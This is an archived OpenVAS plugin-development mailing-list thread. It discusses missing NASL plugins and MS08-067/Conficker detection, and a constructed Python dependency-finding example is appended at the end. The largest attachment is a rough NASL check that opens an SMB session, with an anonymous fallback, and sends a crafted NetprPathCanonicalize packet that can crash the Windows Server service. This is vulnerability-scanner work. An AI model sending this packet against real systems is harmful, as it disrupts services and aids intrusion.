As of now, the following Plugins are missing,

apcnisd_detect.nasl
cisco_ids_manager_detect.nasl
e107_detect.nasl
invision_power_board_detect.nasl
ms_telnet_overflow.nasl
msrpc_dcom2.nasl
openca_html_injection.nasl
os_fingerprint.nasl
phorum_detect.nasl
php_nuke_installed.nasl
phpmyfaq_detect.nasl
postnuke_detect.nasl
rsync_modules.nasl
serendipity_detect.nasl
snmp_sysDesc.nasl
sybase_detect.nasl
sybase_easerver_detect.nasl
webcalendar_detect.nasl
webmirror.nasl
www_too_long_url.nasl
xoops_detect.nasl
yahoo_msg_running.nasl

You could take some of these for development. The way to go about would be, check the Plugins that are depending on the above and analyze what they expect. In general, some missing KB item setting has to be done in the way the dependent Plugins expect.

Thanks,
Chandra.

________________________________________
From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Goran Licina
Sent: Monday, March 30, 2009 2:43 PM
To: Openvas-plugins at wald.intevation.org
Subject: [Openvas-plugins] New plugin development team

Hi,

in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly.

So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that?
Best regards,

Goran Licina
--
Laboratory for Systems and Signals
Department of Electronic Systems and Information Processing
Faculty of Electrical Engineering and Computing
University of Zagreb

From c_edjenguele at yahoo.it Mon Mar 30 15:00:48 2009
From: c_edjenguele at yahoo.it (Christian Eric EDJENGUELE)
Date: Mon, 30 Mar 2009 13:00:48 +0000 (GMT)
Subject: [Openvas-plugins] Plugins dependencies
In-Reply-To:
References:
Message-ID: <659770.91777.qm@web28612.mail.ukl.yahoo.com>

Hello,
I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl
Cheers.

> sybase_detect.nasl
> sybase_easerver_detect.nasl

---
Christian Eric Edjenguele
IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect
mobile (IT): +39 3408580513

From mime at gmx.de Mon Mar 30 15:07:13 2009
From: mime at gmx.de (Michael Meyer)
Date: Mon, 30 Mar 2009 15:07:13 +0200
Subject: [Openvas-plugins] Plugins dependencies
In-Reply-To: <659770.91777.qm@web28612.mail.ukl.yahoo.com>
References: <659770.91777.qm@web28612.mail.ukl.yahoo.com>
Message-ID: <20090330130713.GA4366@m2.homelinux.org>

Hello Christian,

*** Christian Eric EDJENGUELE wrote:
> Hello,
> I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl
> Cheers.
>
> > sybase_detect.nasl
> > sybase_easerver_detect.nasl

Hmmm...
mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep remote-detect-sybase-easerver.nasl *.nasl | wc -l
0

mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep sybase_easerver_detect.nasl *.nasl | wc -l
2

Micha

From christian.edjenguele at owasp.org Mon Mar 30 20:48:05 2009
From: christian.edjenguele at owasp.org (Christian Eric Edjenguele)
Date: Mon, 30 Mar 2009 20:48:05 +0200
Subject: [Openvas-plugins] Plugins dependencies
In-Reply-To: <20090330130713.GA4366@m2.homelinux.org>
References: <659770.91777.qm@web28612.mail.ukl.yahoo.com> <20090330130713.GA4366@m2.homelinux.org>
Message-ID: <49D113E5.4080608@owasp.org>

Hi Michael:

chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ ls . | grep remote-detect-sybase
remote-detect-sybase-easerver-mgmt.nasl
remote-detect-sybase-easerver.nasl

you are looking for remote-detect-sybase-easerver.nasl in script code! as I said the name in the code is wrong
the right script name is in "remote-detect-sybase-easerver.nasl" you can find it in the script directory as you can see.

I've just made the fix.

Cheers.

Michael Meyer wrote:
> Hello Christian,
>
> *** Christian Eric EDJENGUELE wrote:
>> Hello,
>> I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl
>> Cheers.
>>
>>> sybase_detect.nasl
>>> sybase_easerver_detect.nasl
>
> Hmmm...
>
> mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep remote-detect-sybase-easerver.nasl *.nasl | wc -l
> 0
>
> mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep sybase_easerver_detect.nasl *.nasl | wc -l
> 2
>
> Micha

--
Christian Eric Edjenguele
IT Security Software Engineer / IT Enterprise Software Architect
Mobile (IT): +39 3408580513
PGP KeyID: 0xB1654498
Key Server: http://pgp.mit.edu

From bchandra at secpod.com Tue Mar 31 14:06:42 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Tue, 31 Mar 2009 17:36:42 +0530
Subject: [Openvas-plugins] Conficker worm detection - OpenVAS plugins
Message-ID:

Conficker worm variants A, B and C are dependent on vulnerability in Microsoft server service. Microsoft had released an advisory MS08-067 back in October 2008 to address the above vulnerability. As was expected at that time, number of attacks are spreading, major one being Conficker worm.

We have plugins for OpenVAS,

900055 - secpod_ms08-067_900055.nasl
900056 - secpod_ms08-067_900056.nasl

to detect patch condition of MS08-067.
The plugin 900055 requires SMB credentials and verifies if the required hotfix is installed through Windows Registry and verifying the updated file versions. The plugin 900056 is a Proof of Concept exploit that tries to crash the server service (safe_checks has to be disabled). This can work on anonymous login credentials if the target system allows anonymous login (Windows 2000 by default allows anonymous login). The plugin checks the RPC response status of an un-patched system.

Thanks,
Chandra.

From timb at nth-dimension.org.uk Tue Mar 31 22:46:18 2009
From: timb at nth-dimension.org.uk (Tim Brown)
Date: Tue, 31 Mar 2009 21:46:18 +0100
Subject: [Openvas-plugins] Conficker worm detection - OpenVAS plugins
In-Reply-To:
References:
Message-ID: <200903312146.19680.timb@nth-dimension.org.uk>

On Tuesday 31 March 2009 13:06:42 Chandrashekhar B wrote:

*snip*

> to detect patch condition of MS08-067. The plugin 900055 requires SMB
> credentials and verifies if the required hotfix is installed through
> Windows Registry and verifying the updated file versions. The plugin 900056
> is a Proof of Concept exploit that tries to crash the server service
> (safe_checks has to be disabled). This can work on anonymous login
> credentials if the target system allows anonymous login (Windows 2000 by
> default allows anonymous login). The plugin checks the RPC response status
> of an un-patched system.

This is all true but it doesn't really go far enough since it only looks for the original vulnerability and not Conficker. I started working on a check for Conficker last night and got some way before I noticed a glaring problem but nothing which at this stage is complete. I've attached the plugin in rough form here if anyone wants to take it up. The problems I've had so far is the lack of support for non-clear text authentication in the OpenVAS SMB implementation which is limiting my ability to test here, as I only have 2003/Vista systems to play with.
I've diverted to start working on that and will be sending another email shortly to openvas-devel regarding this.

Cheers,
Tim
--
Tim Brown

-------------- next part --------------
#############################################################################
# Based on the work of Tim Brown as published
# here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the
# associated NASL from SecPod
############################################################################

if(description)
{
  script_id(900056);
  script_dependencies("secpod_reg_enum.nasl");
  exit(0);
}

include("smb_nt.inc");

# This check is intrusive, so do nothing when safe_checks is enabled
if(safe_checks()){
  exit(0);
}

# Target name, credentials and SMB port from the knowledge base
name = kb_smb_name();
login = kb_smb_login();
pass = kb_smb_password();
domain = kb_smb_domain();
port = kb_smb_transport();

soc = open_sock_tcp(port);
if(!soc){
  exit(0);
}

# Fall back to an anonymous (empty) login when no credentials are configured
if(!domain) domain = "";
if(!login) login = "";
if(!pass) pass = "";

r = smb_session_request(soc:soc, remote:name);
if(!r)
{
  close(soc);
  exit(0);
}

prot = smb_neg_prot(soc:soc);
if(!prot){
  close(soc);
  exit(0);
}

r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);
if(!r)
{
  close(soc);
  report = string("MS08-067: Failed to perform Clear Text based authentication.");
  security_note(data:report, port:port);
  exit(0);
}

uid = session_extract_uid(reply:r);
if(!uid)
{
  close(soc);
  exit(0);
}

r = smb_tconx(soc:soc, uid:uid, share:"IPC$", name:name);
if(!r)
{
  close(soc);
  exit(0);
}

tid = tconx_extract_tid(reply:r);
if(!tid)
{
  close(soc);
  exit(0);
}

# Split the tree and user IDs into low/high bytes for the SMB headers below
tid_high = tid / 256;
tid_low = tid % 256;
uid_high = uid / 256;
uid_low = uid % 256;

# \srvsvc Request
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0b, 0x00,
                 0x18, 0xff, 0x00, 0x00, 0x00, 0x00, 0x0e, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
                 0x00, 0x11, 0x00, 0x00, 0x5c, 0x00, 0x73, 0x00,
                 0x72, 0x00, 0x76, 0x00, 0x73, 0x00, 0x76, 0x00,
                 0x63, 0x00, 0x00, 0x00);

# Prepend the 4-byte session header carrying the request length
req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
send(socket:soc, data:req);
resp = smb_recv(socket:soc, length:4096);
if(strlen(resp) < 107)
{
  close(soc);
  exit(0);
}

# File ID of the opened pipe, taken from the response
fid_low = ord(resp[42]);
fid_high = ord(resp[43]);

# srvsvc Bind Request
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0c, 0x00,
                 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0xb8,
                 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x48,
                 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low,
                 fid_high, 0x57, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00,
                 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00,
                 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x05, 0x00,
                 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00,
                 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b, 0x70, 0x16,
                 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e,
                 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d,
                 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8,
                 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00,
                 0x00, 0x00);

req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
send(socket:soc, data:req);
smb_recv(socket:soc, length:4096);

# ntrPathCanonicalize Request (With Malicious Code)
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0x00, 0x28, uid_low, uid_high, 0x0d, 0x00,
                 0x10, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0xb8,
                 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x7c,
                 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low,
                 fid_high, 0x83, 0x04, 0x00, 0x5c, 0x00, 0x50, 0x00,
                 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00,
                 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0x06, 0x00,
                 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x1f, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
                 0x00, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00,
                 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x38, 0x00,
                 0x2e, 0x00, 0x31, 0x00, 0x35, 0x00, 0x33, 0x00,
                 0x2e, 0x00, 0x31, 0x00, 0x32, 0x00, 0x39, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x5c, 0x00,
                 0x2e, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x10, 0x27, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x01, 0x00, 0x00, 0x00);

req = raw_string(0x00, 0x00, 0x00, 0xce) + req;
send(socket:soc, data:req);
resp = smb_recv(socket:soc, length:1024);

# Debug: dump the raw response to a file for inspection
fwrite(file:"/tmp/bah", data:resp);

close(soc);
exit(0);

From goran.licina at lss.hr Tue Mar 31 15:21:31 2009
From: goran.licina at lss.hr (Goran Licina)
Date: Tue, 31 Mar 2009 15:21:31 +0200
Subject: [Openvas-plugins] New plugin development team
References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> <55D893D00BE943C4BE1C6A8EDF7ABE25@bchandra>
Message-ID: <8A02A3DF683DEE42BE73187F4CA4444C0394CD@vlasta.lss-net.lss.hr>

Thank you for your suggestions. We will check these plugins and let you know on which plugins we will start working.

Best regards,
Goran Licina

-----Original Message-----
From: openvas-plugins-bounces at wald.intevation.org on behalf of Chandrashekhar B
Sent: Mon 3/30/2009 2:40 PM
To: Goran Licina; Openvas-plugins at wald.intevation.org
Subject: Re: [Openvas-plugins] New plugin development team

Thanks for offering to help! We had started on this exercise of reworking the missing Plugins and completed some of them.
As of now, the following Plugins are missing,

  apcnisd_detect.nasl
  cisco_ids_manager_detect.nasl
  e107_detect.nasl
  invision_power_board_detect.nasl
  ms_telnet_overflow.nasl
  msrpc_dcom2.nasl
  openca_html_injection.nasl
  os_fingerprint.nasl
  phorum_detect.nasl
  php_nuke_installed.nasl
  phpmyfaq_detect.nasl
  postnuke_detect.nasl
  rsync_modules.nasl
  serendipity_detect.nasl
  snmp_sysDesc.nasl
  sybase_detect.nasl
  sybase_easerver_detect.nasl
  webcalendar_detect.nasl
  webmirror.nasl
  www_too_long_url.nasl
  xoops_detect.nasl
  yahoo_msg_running.nasl

You could take some of these for development. The way to go about would be, check the Plugins that are depending on the above and analyze what they expect. In general, some missing KB item setting has to be done in the way the dependent Plugins expect.

Thanks,
Chandra.

________________________________________
From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Goran Licina
Sent: Monday, March 30, 2009 2:43 PM
To: Openvas-plugins at wald.intevation.org
Subject: [Openvas-plugins] New plugin development team

Hi,

in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly. So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that?

Best regards,
Goran Licina
--
Laboratory for Systems and Signals
Department of Electronic Systems and Information Processing
Faculty of Electrical Engineering and Computing
University of Zagreb
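The procedure described in the message above (find the plugins that depend on a missing one and work out which KB items they expect) can be scripted. The following is an added example, not code from the thread or from the OpenVAS project; the sample plugin sources, the dependent plugin name xoops_sql_injection.nasl and the KB key names are constructed for illustration.

```python
import re

# Constructed sample plugin sources (file name -> NASL text). The dependent
# plugin name and the KB keys are illustrative, not taken from the OpenVAS feed.
SAMPLE_PLUGINS = {
    "xoops_sql_injection.nasl": '''
if(description) {
  script_dependencies("xoops_detect.nasl", "http_version.nasl");
  script_require_keys("www/xoops");
  exit(0);
}
ver = get_kb_item("www/80/xoops");
dir = get_kb_item(string("www/", port, "/xoops"));
''',
    "http_version.nasl": '''
if(description) { script_dependencies("find_service.nasl"); exit(0); }
set_kb_item(name:"www/banner/80", value:banner);
''',
    "find_service.nasl": 'if(description) { exit(0); }',
}

# Heuristic patterns: NASL is not fully parsed, only call arguments are grabbed.
DEP_CALL = re.compile(r'script_dependenc(?:ies|ie)\s*\(([^)]*)\)')
KB_READ = re.compile(r'(?:get_kb_item|get_kb_list|script_require_keys)\s*\(([^;]*)\)\s*;')
QUOTED = re.compile(r'"([^"]*)"')

def missing_dependencies(plugins):
    """Map each missing plugin file to the dependents that reference it and to
    the string literals (full keys or key fragments) those dependents read."""
    report = {}
    for name, source in plugins.items():
        deps = [d for call in DEP_CALL.findall(source) for d in QUOTED.findall(call)]
        kb_literals = {s for call in KB_READ.findall(source)
                       for s in QUOTED.findall(call)}
        for dep in deps:
            if dep not in plugins:  # dependency file is absent from the plugin set
                entry = report.setdefault(dep, {"dependents": [], "kb_reads": set()})
                entry["dependents"].append(name)
                entry["kb_reads"].update(kb_literals)
    return report

if __name__ == "__main__":
    for dep, info in sorted(missing_dependencies(SAMPLE_PLUGINS).items()):
        print(dep, "needed by", info["dependents"], "reads", sorted(info["kb_reads"]))
```

Keys built with string() show up as fragments ("www/", "/xoops"), so the dependent's source still has to be read to see the full key a replacement plugin must set.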